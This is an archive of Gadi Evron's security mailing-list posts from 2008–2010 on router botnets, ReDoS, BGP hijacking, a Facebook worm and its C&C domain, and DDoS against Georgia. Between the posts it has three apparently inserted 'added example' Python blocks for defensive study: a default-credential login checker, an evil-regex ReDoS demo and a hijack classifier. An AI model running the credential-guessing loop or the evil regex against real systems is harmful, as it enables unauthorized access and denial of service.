Paper on the law and Implantable Devices security

2010-07-27 Thread Gadi Evron
A new research paper from the Freedom And Law Center deals with issues 
that some of us keep raising these past few years, and does a good job 
at it - bionic hacking (or cybernetic hacking if you prefer).


"Killed by Code: Software Transparency in Implantable Medical Devices" 
outlines some of the history of these devices and even shows some cases 
where devices have been recalled (likely due to software issues).


Some of the paper's recommendations are especially interesting, such as 
to create a database of implantable devices code, so that if the vendor 
disappears it can still be patched (I rephrased).


While unintentional, I am considered the father of this field (not that 
I'm complaining) and I can't even begin to tell you how excited I am 
that a field I have been evangelizing for some years now is finally 
getting more attention -- even if from the legal standpoint with the 
main concern of liability.


Still, I can't help but maintain some skepticism that before some 
disaster happens (to us or others) this won't be taken too seriously.


The paper can be found here:
http://www.softwarefreedom.org/resources/2010/transparent-medical-devices.html

Here's a 2007 Wired article covering the subject from a talk I gave, 
covering the subject from a different perspective:

http://www.wired.com/threatlevel/2007/08/will-the-bionic/

Gadi.


Chuck Norris Botnet and Broadband Routers

2010-02-23 Thread Gadi Evron
Last week Czech researchers released information on a new worm which 
exploits CPE devices (broadband routers) by means such as default 
passwords, constructing a large DDoS botnet. Today this story hit 
international news.


Original Czech:
http://praguemonitor.com/2010/02/16/czech-experts-uncover-global-virus-network

English:
http://www.pcworld.com/businesscenter/article/189868/chuck_norris_botnet_karatechops_routers_hard.html

When I raised this issue before in 2007 on NANOG, some other vetted 
mailing lists and on CircleID, the consensus was that the vendors will 
not change their position on default settings unless "something 
happens". I guess this is it, but I am not optimistic on seeing activity 
from vendors on this now, either.


CircleID story 1:
http://www.circleid.com/posts/broadband_routers_botnets/

CircleID story 2:
http://www.circleid.com/posts/broadband_router_insecurity/

The spread of insecure broadband modems (DSL and Cable) is extremely 
widespread, with numerous ISPs, large and small, whose entire (read 
significant portions of) broadband population is vulnerable. In tests 
Prof. Randy Vaughn and I conducted with some ISPs in 2007-8 the results 
have not been promising.


Further, many of these devices world wide serve as infection mechanisms 
for the computers behind them, with hijacked DNS that points end-users 
to malicious web sites.


On the ISPs' end, much like in the early days of botnets, many service 
providers did not see these devices as their responsibility -- even 
though in many cases they are the providers of the systems, and these 
posed a potential DDoS threat to their networks. As a mind-set, 
operationally taking responsibility for devices located at the homes of 
end users made no sense, and therefore the stance ISPs took on this 
issue was understandable, if irresponsible.


As we can't rely on the vendors, ISPs should step up, and at the very 
least ensure that devices they provide to their end users are properly 
set up (a significant number of ISPs already pre-configure them for 
support purposes).


The Czech researchers have done a good job and I'd like to thank them 
for sharing their research with us.


In this article by Robert McMillan, some details are shared in English:

--
Discovered by Czech researchers, the botnet has been spreading by taking 
advantage of poorly configured routers and DSL modems, according to Jan 
Vykopal, the head of the network security department with Masaryk 
University's Institute of Computer Science in Brno, Czech Republic.


The malware got the Chuck Norris moniker from a programmer's Italian 
comment in its source code: "in nome di Chuck Norris," which means "in 
the name of Chuck Norris." Norris is a U.S. actor best known for his 
martial arts films such as "The Way of the Dragon" and "Missing in Action."


Security experts say that various types of botnets have infected 
millions of computers worldwide to date, but Chuck Norris is unusual in 
that it infects DSL modems and routers rather than PCs.


It installs itself on routers and modems by guessing default 
administrative passwords and taking advantage of the fact that many 
devices are configured to allow remote access. It also exploits a known 
vulnerability in D-Link Systems devices, Vykopal said in an e-mail 
interview.


A D-Link spokesman said he was not aware of the botnet, and the company 
did not immediately have any comment on the issue.


Like an earlier router-infecting botnet called Psyb0t, Chuck Norris can 
infect a MIPS-based device running the Linux operating system if its 
administration interface has a weak username and password, he said. This 
MIPS/Linux combination is widely used in routers and DSL modems, but the 
botnet also attacks satellite TV receivers.

--

Read more here:
http://www.pcworld.com/businesscenter/article/189868/chuck_norris_botnet_karatechops_routers_hard.html

I will post updates on this as I discover them on my blog, under this 
same post, here:

http://gadievron.blogspot.com/2010/02/chuck-norris-botnet-and-broadband.html

Gadi.
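The infection mechanism described above (guessing default administrative passwords on a remotely reachable admin interface) is also the check an ISP can run against the CPE it hands out. The following is an added example, not code from the original post or from the Czech researchers: a default-credential audit against an HTTP Basic-auth admin page. The target is a constructed stand-in, a tiny local HTTP server that accepts one weak credential pair, and the credential list is illustrative, not any vendor's actual defaults.

```python
"""Default-credential audit for an HTTP Basic-auth router admin interface.

Added example. The "router" is a constructed local stand-in (assumption),
not a real CPE; the credential list is illustrative only.
"""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed, illustrative default pairs (assumption, not a vendor list).
DEFAULT_CREDS = [("admin", "admin"), ("admin", "password"), ("admin", ""), ("root", "root")]


class FakeCpeAdmin(BaseHTTPRequestHandler):
    """Stand-in for a broadband router admin page protected by Basic auth."""

    accepted = "admin:admin"  # the weak factory setting we want the audit to catch

    def do_GET(self):
        hdr = self.headers.get("Authorization", "")
        if hdr.startswith("Basic "):
            try:
                decoded = base64.b64decode(hdr[6:]).decode()
            except Exception:
                decoded = ""
            if decoded == self.accepted:
                self.send_response(200)
                self.end_headers()
                self.wfile.write(b"<html>Router status</html>")
                return
        # Anything else: challenge again, as real admin pages do.
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="router"')
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_cpe():
    """Start the stand-in on a free loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeCpeAdmin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/"


def try_login(url, user, pw, timeout=3):
    """True if the interface accepts user:pw over Basic auth, False on 401."""
    token = base64.b64encode(f"{user}:{pw}".encode()).decode()
    req = Request(url, headers={"Authorization": "Basic " + token})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except HTTPError as e:
        if e.code == 401:
            return False
        raise  # other errors (403, 5xx) are worth seeing, not hiding


def audit_default_creds(url, creds=DEFAULT_CREDS):
    """Return the default pairs the interface accepts; an empty list is a clean result."""
    return [(u, p) for u, p in creds if try_login(url, u, p)]


if __name__ == "__main__":
    srv, url = start_fake_cpe()
    print("accepted defaults:", audit_default_creds(url))
    srv.shutdown()
```

Run against devices you are responsible for only; the point of the check is the pre-configuration step the post asks ISPs for, i.e. confirming that no device ships with a pair from this list still accepted, and that the admin interface is not reachable from the WAN side at all.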


Re: All China, All The Time

2010-01-15 Thread Gadi Evron

On 1/15/10 6:40 PM, Thor (Hammer of God) wrote:

I could only imagine.  The other problem is that many people seem to think I'm 
saying something against the Chinese *people* themselves, based on the "f* you 
round-eye" messages I've received (and they call ME racist).  They don't seem to get 
the clear distinction (to me) between the Chinese people and China's network.  It's 
the machines I'm concerned with, the attacks coming from those machines.  Just because 
the machine is sourced in China doesn't mean the attacker is - so I have to do the 
best I can to defend against the machines.  However, that unfortunately comes across 
to those who choose not to think it through as me saying something against the 
Chinese themselves.

Then again, as you well know, people will take any opportunity they can just to 
be ugly and confrontational, and to have something to rail about.  In the face 
of the reality of China's horribly infected network, when I suggest blocking 
that traffic (as many others have and do), they seize the opportunity to call 
me prejudiced and a racist.


The Chinese network is indeed very infected, which in turn causes the 
rest of the world great computerized harm. Nobody disputes this.


The solution of blocking China, however, is one which harms both people 
outside of China, as well as those inside of China. Therefore, it 
translates into an attack on them.


Looking at this operationally:

1. Functionality

Do you have clients who need to interconnect with China's
networks, or expect people to connect to you from China?

If so, the cost of security by blocking may be unjustifiable.

2. Urgency

If a lot of IP sources attack you from China RIGHT NOW, and you
need immediate mitigation, blocking China short-term may work,
but obviously not as a permanent solution.

As to "getting rid" or "refusing to connect with" networks with 
extremely bad reputation, that may be quite acceptable on an individual 
basis, but not on the Internet-scale, as things stand right now.


When I facilitated making Atrivo (and others) no longer welcome on the 
Internet, it was a brand new move, and it helped change the social 
belief of "don't be the Internet's firewall" to "some bad actors 
shouldn't be here, but generally don't be the Internet's firewall."


Such social change to encourage new technological and operational 
solutions happens every 2-5 years or so, and I don't expect anything 
large enough such as an AS-based reputation system to happen anytime soon.


Also, you should consider that such actions also have direct political 
and diplomatic ramifications neither of us understands.


So, for now, I'd say that each of us should make such decisions by our 
own risk analysis with the trade-off between costs and benefits in mind, 
and only for our own networks.


Aside to that, I know some people in China who work very hard on 
security, and do a better job than we do at it. But that does not mean 
the situation as it stands now is acceptable.



IOW, I really don't think the tag had that much to do with it now...


People are just picking on you because they can. I can only share how I 
see such Internet discussions.


Cost of doing business, just consider your responses on a level of (time 
== money) && what your response would gain for you or the community. If 
the answer is nothing, then examine whether you still believe it is 
worth it. If yes, just do it. If not, move along.


That is my basic guideline after years of trial by fire.

Also, you will always be misunderstood, be careful in your language, but 
not so much that tl;dr. State your case with the obvious exceptions, and 
discuss misunderstandings later. Trying to anticipate everything, as 
opposed to just saying what you think, would mean people will just 
nitpick on one lower-hanging-fruit item, or ignore it.


Gadi.



T




-Original Message-
From: Gadi Evron [mailto:g...@linuxbox.org]
Sent: Thursday, January 14, 2010 6:27 PM
To: Thor (Hammer of God)
Cc: bugtraq@securityfocus.com
Subject: Re: All China, All The Time

On 1/14/10 8:09 AM, Thor (Hammer of God) wrote:

So, apparently my "witty" tag via Google Translate means something I

didn't quite mean.  Surprise, surprise.  Luckily it wasn't something
vulgar, (that's what I get for trusting Google Translate and trying to
be funny) but what I meant it to say was "If you can read this, don't
bother replying because my servers won't get it."  However, it seems to
mean something like "don't reply because you are not welcome here" or
similar.  That wasn't my intention, as it seems to infer I actually
have something against the Chinese people and not their networks, which
I take issue with.


Sorry for the poorly

NSA Iraqi Computer Attacks And U.S. Defense

2009-11-19 Thread Gadi Evron

In a recent article in the National Journal Magazine, the NSA
supposedly admits to using computer attacks in Iraq, attacking
cellular systems. Aside to the hacking part, which is obviously
"cool", the impact on the US cyber defense stance as well as
international relations is staggering.

I spent some time trying to figure out what facts were given in the
story, and analyze it.

Original story:
http://www.nationaljournal.com/njmagazine/cs_20091114_3145.php

My clean-up and analysis:
http://darkreading.com/blog/archives/2009/11/nsa_iraqi_compu.html

   Gadi.


--
Gadi Evron,
g...@linuxbox.org.

Blog: http://gevron.livejournal.com/



Announcement: Critical Internet Infrastructure WG is now open to public participation

2009-11-18 Thread Gadi Evron

ISOTF Critical Internet Infrastructure WG is now open to public
participation.

The group holds top experts on internet technology, critical
infrastructure, and internet governance, from around the globe.

Together, we discuss definitions, problems, challenges and solutions in
securing and assuring the reliability of the global internet
infrastructure, which is critical infrastructure for a growing number of
nations, corporations and indeed, individuals -- world wide.

The group started as a closed and private forum, to discuss technical
and operational risks, as other venues limited discussion of critical
internet resources to politically charged subjects such as control of
ICANN and ARIN, thus overshadowing other important aspects.

As of November 18th 2009, the list is open for public access, to advance
public awareness of the issues, and bring new talent on board.

The group is hosted by the ISOTF, but is governed by members.

Note: SCADA, network operations, and other related issues should be
discussed in the appropriate forums, elsewhere. This group deals with
the internet.

To subscribe:
http://isotf.org/mailman/listinfo/cii

Gadi Evron for ISOTF-CII-WG.



Re: Regular Expression Denial of Service

2009-09-11 Thread Gadi Evron

Thierry Zoller wrote:

Hi,

With all due respect - this is known to be a vulnerability class for
over a century. Just because it doesn't have an acronym à la XSS
doesn't mean it's not known to be a vulnerability. Can we please stop
the attitude of inventing acronyms for vulnerabilities, making it look
like it's something new and funky.

It's the impact of something that makes it a vulnerability, not the
name.


Thierry, you are quite right. However, I don't think they claimed it was 
a new class of vulnerabilities, and the responses since just added data 
to it. So I think that while you are factually correct, you misread 
their post. They shared their research with us.


Gadi.








Re: Regular Expression Denial of Service

2009-09-11 Thread Gadi Evron

Alex Roichman wrote:

Checkmarx Research Lab presents a new attack vector on Web applications. By
exploiting the Regular Expression Denial of Service (ReDoS) vulnerability an
attacker can make a Web application unavailable to its intended users. ReDoS
is commonly known as a “bug” in systems, but Alex Roichman and Adar Weidman
from Checkmarx show how serious it is and how using this technique, various
applications can be “ReDoSed”. These include, among others, Server-side of
Web applications and Client-side Browsers. The art of attacking the Web by
ReDoS is by finding inputs which cannot be matched by Regexes and on these
Regexes a Regex-based Web systems get stuck.

For further reading:
http://www.checkmarx.com/NewsDetails.aspx?id=23&cat=3


Alex, nice work. Thank you for sharing it with us.

I'd recommend taking a look at Ilja van Sprundel's work with regular 
expression bugs in his Unusual bugs presentation.
... Where he played a bit with Google Code Search back in 2007, I think. 
He helped Google out by giving them his research, of course.


I found two versions online:
http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf
http://www.slideshare.net/amiable_indian/unusual-bugs

Ilja and I later discussed creating a real regex fuzzer to discover 
vulnerabilities, but I at least never had the time to play with it. He 
might have, I am CC:ing him.


My best to Adar,

Gadi Evron,
http://www.gadievron.com/
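The mechanism the Checkmarx post describes (an input the regex cannot match, on which the engine gets stuck) and the regex-bug fuzzing discussed in the reply to Thierry above both come down to the same thing: a backtracking engine trying exponentially many ways to fail. The following is an added example, not code from Checkmarx or from Ilja van Sprundel's slides. It puts a classic evil pattern beside a linear rewrite that accepts the same language, times both on a non-matching input, and adds a small heuristic lint for the nested-quantifier shape (assumption: the lint only recognises `(…+)+` / `(…*)*` forms, which is one ReDoS shape among several).

```python
"""ReDoS: an evil regex beside its linear rewrite, plus a nested-quantifier lint.

Added example; EVIL/SAFE and the lint heuristic are illustrative assumptions,
not Checkmarx's or anyone else's published code.
"""
import re
import time

# Nested quantifiers: on "aaa...a!" the engine tries every way of splitting the
# a-run between the inner and outer "+", 2^n paths, before it can report failure.
EVIL = r"^(a+)+$"
# Same language, one quantifier: the engine scans the input once.
SAFE = r"^a+$"

# Heuristic: a group that ends in a quantifier and is itself quantified.
NESTED_QUANT = re.compile(r"\([^()]*[+*]\)[+*]")


def looks_redos_prone(pattern):
    """Lint: True if the pattern contains a (…+)+ or (…*)* style nesting."""
    return NESTED_QUANT.search(pattern) is not None


def match_time(pattern, text):
    """Return (matched, seconds) for one anchored match attempt."""
    t0 = time.perf_counter()
    m = re.match(pattern, text)
    return m is not None, time.perf_counter() - t0


def same_answers(p1, p2, samples):
    """True if both patterns accept and reject exactly the same sample inputs."""
    return all(bool(re.match(p1, s)) == bool(re.match(p2, s)) for s in samples)


if __name__ == "__main__":
    # A non-matching tail is what forces the full backtracking search.
    bad_input = "a" * 20 + "!"
    for name, pat in (("evil", EVIL), ("safe", SAFE)):
        matched, secs = match_time(pat, bad_input)
        print(f"{name:5} matched={matched} took={secs:.3f}s lint={looks_redos_prone(pat)}")
    print("equivalent:", same_answers(EVIL, SAFE, ["", "a", "aaaa", "aaaa!", "ab", "b"]))
```

Lengthen `bad_input` by a few characters at a time and the evil pattern's time roughly doubles each step while the safe one stays flat; that doubling, not any particular threshold, is the signature to look for when fuzzing regexes in a code base. The lint is deliberately narrow: overlapping alternations such as `(a|a)+` and adjacent ambiguous repeats such as `\d+\d+$` are just as bad and it will not flag them.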


CFP: ISOI 7 - Sept 17, 18 - San Diego

2009-06-23 Thread Gadi Evron

The 7th ISOI (Internet Security Operations and Intelligence) will take
place on September 17th and 18th in San Diego, California.

ISOI 7 is kindly hosted by Websense and ESET. The evening reception is
graciously hosted by Facebook.

An early draft agenda can be found here: http://isotf.org/isoi7.html

While attendance is very limited as explained below, it is free of charge.

For previous agendas, please take a look at:

http://isotf.org/isoi6.html (hosted by University of Texas, Dallas,
Baylor and Sunbelt)
http://isotf.org/isoi5.html (hosted by Estonian CERT with reception by
Norman)
http://isotf.org/isoi4.html (hosted by Yahoo!)
http://isotf.org/isoi3.html (hosted by ISOC, Afilias and ICANN)
http://isotf.org/isoi2.html (hosted by Microsoft with reception by
Trendmicro)
http://isotf.org/isoi.html (hosted by Cisco with reception by ISC)

CFP:

We solicit proposals for presentations from the public. A short abstract
(with data to back it up) can be sent to cont...@isotf.org.

The main topics of interest are Internet infrastructure defense, cyber
crime, online fraud, phishing, DDoS and botnets. We also solicit
proposals for debates.

While the conference and groups are vetted, we believe in public
involvement and making information public whenever possible. Therefore,
we once again keep a couple of agenda slots open for the public.

Background:
---
ISOI is a closed conference for members of the different Internet
security operations communities, bringing different groups together
(such as MWP, nsp-sec, MAAWG, etc.)

In the conference you will find professionals from many industries:
network operators, anti virus researchers, law enforcement, academia and
government officials from around the world.

Personal note:
--
It's time to let ISOI fly free, I will not be attending this one. I
would like to use this opportunity to thank Randy Vaughn, Dan Hubbard
and Jeff Debrosse for their efforts in making ISOI 7 happen.

Cordially yours,

Gadi.




one shot remote root for linux?

2009-04-28 Thread Gadi Evron

Sometimes news finds us in mysterious yet obvious ways.

HD set a status which I noticed on my twitter:

@hdmoore reading through sctp_houdini.c - one-shot remote linux kernel
root - http://kernelbof.blogspot.com/

I asked him about it on IM, wondering if it is real:
"looks like that
but requires a sctp app to be running"

Naturally, I retweeted.

Signed,

@gadievron


reliable IOS exploitation

2008-12-30 Thread Gadi Evron
FX has given a comprehensive talk about IOS exploitation (including even TCL 
scripts operators leave behind when they move jobs to retain access).


He has shown effective and ineffective ways of detecting compromise in IOS.

Then, he has shown how reliable exploitation of IOS routers works.

His talk will probably be downloadable from the CCC (25C3) web site by 
tomorrow.


Gadi.


ISOI 6, Dallas, TX - January 29, 30

2008-12-10 Thread Gadi Evron

Hi all. ISOI is once again happening, and back to the States.

Almost final agenda: http://isotf.org/isoi6.html

As usual, while attendance is limited to the folks who are busy "saving the 
Internet"/"fighting crime", it is free of charge.


Once again we offer the public at-large the opportunity to attend without such 
membership. The process is: you submit a relevant talk, get vetted and get 
accepted. We have two slots reserved for such a purpose.


Subjects of interest: case studies, attacks, botnets, fraud, ...
To submit email your talk idea to [EMAIL PROTECTED]

Is it time to say merry Xmas yet?

Gadi.


[funsec] ICANN Terminates EstDomains' Registrar Accreditation (fwd)

2008-10-30 Thread Gadi Evron



-- Forwarded message --
Date: Tue, 28 Oct 2008 20:47:48 -0700
From: Paul Ferguson <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: [funsec] ICANN Terminates EstDomains' Registrar Accreditation

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

"Dear Mr. Tsastsin,

"Be advised that the Internet Corporation for Assigned Names and Numbers
(ICANN) Registrar Accreditation Agreement (RAA) for EstDomains, Inc.
(customer No. 919, IANA No. 943) is terminated..."

Via ICANN.org:
http://www.icann.org/correspondence/burnette-to-tsastsin-28oct08-en.pdf

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.6.3 (Build 3017)

wj8DBQFJB9zaq1pz9mNUZTMRAiNOAKCKGwfwxJxnCxR/5zo4wU77enGQRACeKCY7
Sc2Bwob4aRRtRocYArtoVtU=
=ggSS
-END PGP SIGNATURE-


--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.


Estonian Cyber Security Strategy document -- now available online

2008-09-26 Thread Gadi Evron

Hello.

The Estonian cyber security strategy document is now available online.
I must say once again the concept of a national cyber security stance is 
quite interesting.


Those who wish to download the document:
http://www.mod.gov.ee/?op=body&id=518

My contact there specified she'd be happy to answer any questions. To 
avoid spam of her inbox, email me for her address.


Gadi Evron.


community real-time BGP hijack notification service

2008-09-12 Thread Gadi Evron

Hi, WatchMy.Net is a new community service to alert you when your prefix
has been hijacked, in real-time.

Following the discussion on NANOG a couple of weeks ago on what to do if
your prefix is hijacked, people mentioned that detection-wise, free
services are limited (to certain communities or by not being real-time).

The current fully public and free services will alert you with a few
hours delay.

Over labor day weekend we built a free real-time service. We invite people to 
try it out during our beta stage.


Register for alerts at:
http://www.watchmy.net/

We hope you find it useful,
Avi Freedman, Andrew Fried && Gadi Evron.
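The decision such an alerting service has to make is the interesting part: given what the route collectors see, is an announcement of your space legitimate or not? The following is an added example of that decision logic, not WatchMy.Net's code, and it assumes nothing about how that service is built. The monitored prefixes, allowed origin ASNs and observed announcements are all constructed input, of the kind a route-collector feed would provide as (prefix, origin ASN) pairs. Covering less-specific announcements from another AS are deliberately not flagged here, since an upstream aggregate is usually legitimate.

```python
"""Prefix-hijack classification over observed BGP announcements.

Added example. MONITORED and OBSERVED are constructed data; the detection
rules are this example's assumptions, not any real service's implementation.
"""
import ipaddress

# Constructed: the space we own, mapped to the origin AS(es) allowed to announce it.
MONITORED = {
    "203.0.113.0/24": {64500},
    "2001:db8::/32": {64500, 64501},
}

# Constructed observations as (prefix, origin_asn), in the order a feed delivered them.
OBSERVED = [
    ("203.0.113.0/24", 64500),    # our own announcement
    ("203.0.113.0/24", 64666),    # same prefix, foreign origin: classic origin hijack
    ("203.0.113.128/25", 64666),  # more-specific from a foreign origin: wins by longest match
    ("2001:db8:1::/48", 64501),   # more-specific from one of our own ASes: note it, not alarm
    ("198.51.100.0/24", 64700),   # unrelated space
    ("203.0.113.0/24", 64666),    # duplicate update, should not alert twice
]


def classify(prefix, origin, monitored=MONITORED):
    """Return ("hijack", reason), ("more-specific", reason) or None for one announcement."""
    net = ipaddress.ip_network(prefix, strict=False)
    for mine, allowed in monitored.items():
        mine_net = ipaddress.ip_network(mine)
        # subnet_of() raises on mixed address families, so compare versions first.
        if net.version != mine_net.version or not net.subnet_of(mine_net):
            continue
        if origin not in allowed:
            return ("hijack", f"{prefix} originated by AS{origin}, expected {sorted(allowed)}")
        if net.prefixlen > mine_net.prefixlen:
            return ("more-specific", f"{prefix} inside {mine} announced by AS{origin}")
    return None


def alerts(observations, monitored=MONITORED):
    """Classify every distinct (prefix, origin) pair once; return the non-None findings."""
    seen = set()
    findings = []
    for prefix, origin in observations:
        key = (prefix, origin)
        if key in seen:
            continue
        seen.add(key)
        verdict = classify(prefix, origin, monitored)
        if verdict is not None:
            findings.append(verdict)
    return findings


if __name__ == "__main__":
    for kind, reason in alerts(OBSERVED):
        print(f"{kind:13} {reason}")
```

In a real feed the origin AS comes from the last element of the AS_PATH, so an attacker who prepends your ASN (a path-forging hijack) passes this origin check; catching that needs path or RPKI validation on top, which is outside what this block shows.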


reviving the botnets@ mailing list: a new strategy in fighting cyber crime

2008-08-28 Thread Gadi Evron
The public botnets@ mailing list, where malicious activity on the Internet 
can be openly shared, has been revived, and boy is it active.


Warning: live samples and malicious URLs are openly shared there.

Mailing list URL: 
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets


Reasons, thinking and explanations:
http://gadievron.blogspot.com/2008/08/public-sharing-and-new-statregy-in.html

Excerpt:
--
A couple of years ago I started a mailing list where folks not necessarily 
involved with the vetted, trusted, closed and snobbish circles of cyber 
crime fighting (some founded by me) could share information and be 
informed of threats.


In this post I explore some of the history behind information sharing 
online, and explain the concept behind the botnets mailing list. Feel free 
to skip ahead if you find the history boring. Also, do note the history in 
this post is mixed with my own opinions. As I am one of the only people 
who were there in the beginning though and lived through all of it, I 
feel free to do so (in my own blog post).


As I conclude, we may not be able to always share our resources, but it is 
time to change the tide of the cyber crime war, and strategize. One of the 
strategies we need to use, or at least try, is public information sharing 
of "lesser evils" already in the public domain.


..
..

To fight a war, you have to be involved and engaged. On the Internet that 
is very difficult, but the Russians found a way. It is a fact that while 
we made much progress in our efforts fighting cyber crime, we had nearly 
no effect whatsoever on the criminals and the attackers. None. They 
maintain their business and we play at writing analysis and whack-a-mole.


Using the botnets mailing list, I am borrowing a page from the apparent 
Russian cyber war doctrine, getting people involved, engaged. Personally 
aware and a part of what's going on.


It can't hurt us, and perhaps now, four years over-due and two years after 
the previous attempt, we may be ready to give it a go and test the 
concept.

---

Gadi Evron.

--
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant 
General,
   Israel's Ministry of Finance, at the government's CIO conference, 2005.

(after two very funny self-deprecation quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron


Internet attacks against Georgian web sites

2008-08-12 Thread Gadi Evron
In the last days news and government web sites in Georgia suffered DDoS 
attacks. While these attacks seem to affect the Georgian Internet, it is still 
there.


Facts:
1. There are botnet attacks against .ge websites.
2. These attacks affect the .ge Internet infrastructure, but it's reachable.
3. It doesn't seem Internet infrastructure is directly attacked.
4. Every other political tension in the past 10 years, from a comic of the 
Prophet Muhammad to the war in Iraq, was followed by online supporters 
attacking targets which seem affiliated with the opposing side, and vice versa.


Up to the Estonian war, such attacks would be called "hacker enthusiast 
attacks" or "cyber terrorism" (of the weak sort). Nowadays any attack with a 
political nature seems to get the "information warfare" tag. When 300 
Lithuanian web sites were defaced last month, "cyber war" was the buzzword.


Running security for the Israeli government Internet operation and later the 
Israeli government CERT such attacks were routine, and just by speaking on them 
in the local news outlets I started bigger so-called "wars" when enthusiasts 
responded in the story comments and then attacked the "other side".


Not every fight is warfare. While Georgia is obviously under DDoS attacks 
and it is political in nature, it doesn't so far seem different than any other 
online aftermath by fans. Political tensions are always followed by online 
attacks by sympathizers.


Could this somehow be indirect Russian action? Yes, but considering Russia is 
past playing nice and uses real bombs, they could have attacked more strategic 
targets or eliminated the infrastructure kinetically.


Coulda, shoulda… the nature of what's going on isn't clear, but until we are 
certain anything state-sponsored is happening on the Internet it is my official 
opinion this is not warfare, but just some unaffiliated attacks by Russian 
hackers and/or some rioting by enthusiastic Russian supporters.


It is too early to say for sure what this is and who is behind it.

The RBN blog (following the Russian Business Network) is of a different 
opinion:

http://rbnexploit.blogspot.com/2008/08/rbn-georgia-cyberwarfare.html
and:
http://rbnexploit.blogspot.com/2008/08/rbn-georgia-cyberwarfare-2-sat-16-00.html

Also, Renesys has been following the situation and provides some data:
http://www.renesys.com/blog/2008/08/georgia_clings_to_the_net.shtml

(Thanks to Paul Ferguson for the URLs)

DDoS attacks harm the Internet itself rather than just this or that web site, 
so soon this may require some of us in the Internet security operations 
community getting involved in mitigating the attacks, if they don't just drop 
on their own.


Gadi Evron.


Re: [funsec] facebook messages worm

2008-08-07 Thread Gadi Evron

On Thu, 7 Aug 2008, Juha-Matti Laurio wrote:

It has the following mechanism according to McAfee:
http://vil.nai.com/vil/content/v_148955.htm

They use name W32/Koobface.worm and Kaspersky (Kaspersky Labs originally 
discovered this threat) uses name Net-Worm.Win32.Koobface.b.


This is going to *possibly* cause support line bottlenecks tomorrow.

This worm is somewhat similar to zlob, here is a link to a kaspersky paper 
on a previous iteration of it, they call it koobface:

http://www.kaspersky.com/news?id=207575670

The worm collects spam subject lines from, and then sends the users' 
personal data to, the following C&C:

zzzping.com

I spoke with DirectNIC last night and the Registrar Operations (reg-ops) 
mailing list was updated that the domain is no longer reachable. That was 
very fast response time from DirectNIC, which we appreciate.

The worm is still fast-spreading, watch the statistics as they fly:
http://www.d9.pl/system/stats.php

The facebook security team is working on this, and they are quite capable. 
The security operations community has been doing analysis and 
take-downs, but the worm seems to still be spreading.

All anti virus vendors have been notified, and detection (if not removal) 
should be added within a few hours to a few days.


For now, while users may get infected, their information is safe (UNLESS 
the worm has a secondary contact C&C which I have not verified yet).


It seems like some users may have learned not to click on links in email, 
but any other medium does not compute.


Gadi.



More information here too:
http://www.pcmag.com/article2/0,2817,2327272,00.asp

Juha-Matti

"John C. A. Bambenek, GCIH, CISSP" [EMAIL PROTECTED] kirjoitti: 

What's the infection vector?  URL Link?  Rogue Facebook app?




facebook messages worm

2008-08-07 Thread Gadi Evron

Hi all.

There's a facebook (possibly worm) something malicious sending fake 
messages from real users (friends).


The sample also has a remote drop site (verified by someone who shall 
remain nameless).


This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.

Infection sites seen so far are on .pl domains.

The AV industry will soon add detection.
Facebook's security folks are very capable, so I am not worried on that 
front.


It's not that we didn't expect this for a long time now, but...
Be careful. Some users know to be careful in email.. but not on facebook.

Note: unlike 2003 when we called everything a worm and the 90s when 
everything was a virus--this is a bot which also spreads/infects on facebook.


Gadi.




Re: [funsec] facebook messages worm

2008-08-07 Thread Gadi Evron

http://www.kaspersky.com/news?id=20757567
7 days of seeding to impact.

Gadi.


On Wed, 6 Aug 2008, Gadi Evron wrote:


___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.



Re: [funsec] facebook messages worm

2008-08-07 Thread Gadi Evron
I am constantly updating on this on my twitter account to avoid 
list clutter: 
http://twitter.com/gadievron


You can watch the infection live on a web counter from the hosting 
provider that the worm points to. This thing is fast-spreading.


Gadi.


On Wed, 6 Aug 2008, Gadi Evron wrote:





Announcement && CFP: ISOI 5, Tallinn Estonia

2008-06-18 Thread Gadi Evron
The Internet Security Operations and Intelligence (ISOI) 5th workshop will 
take place on the 11th and 12th of September, 2008.


Venue: Tallinn, Estonia.
Host: Estonian CERT (www.cert.ee).

Attendance:
While payment is not required, to attend you must be a member of one of 
the vetted operational communities, or contact us directly for special 
consideration.


CFP information:
The topics for the CFP include operational nsp security, Internet 
incident response, Internet fraud, cyber crime investigations and general 
case studies.


You can email your suggestions, including a title, short abstract and 
preferred day and time to me personally up to the 28th of July. Late 
submissions for turbo-talks are possible.


For more information you can check out the web pages for previous ISOI 
workshops:


Yahoo - http://isotf.org/isoi44html
ICANN/ISOC/Afilias - http://isotf.org/isoi3.html
Microsoft - http://isotf.org/isoi2.html
Cisco - http://isotf.org/isoi.html

A preliminary program will become available in a few weeks on:
http://isotf.org/isoi5.html

Gadi Evron && Randy Vaughn.


RE: An account of the Estonian Internet War

2008-05-20 Thread Gadi Evron

On Tue, 20 May 2008, Viktor Larionov wrote:

Hi Gadi and all the rest of a community,

I work and live in Estonia, and I was a witness to all happening here,
especially on the cyber-sphere starting the first day.

Let's skip the details on the political context of your story, which from my
point of view is far from being neutral, and pass-on to technical part of
it.

First of all, neither I, nor (well as far as I know) anybody here have seen
any evidence that attacks have originated from Russia. I certainly have no
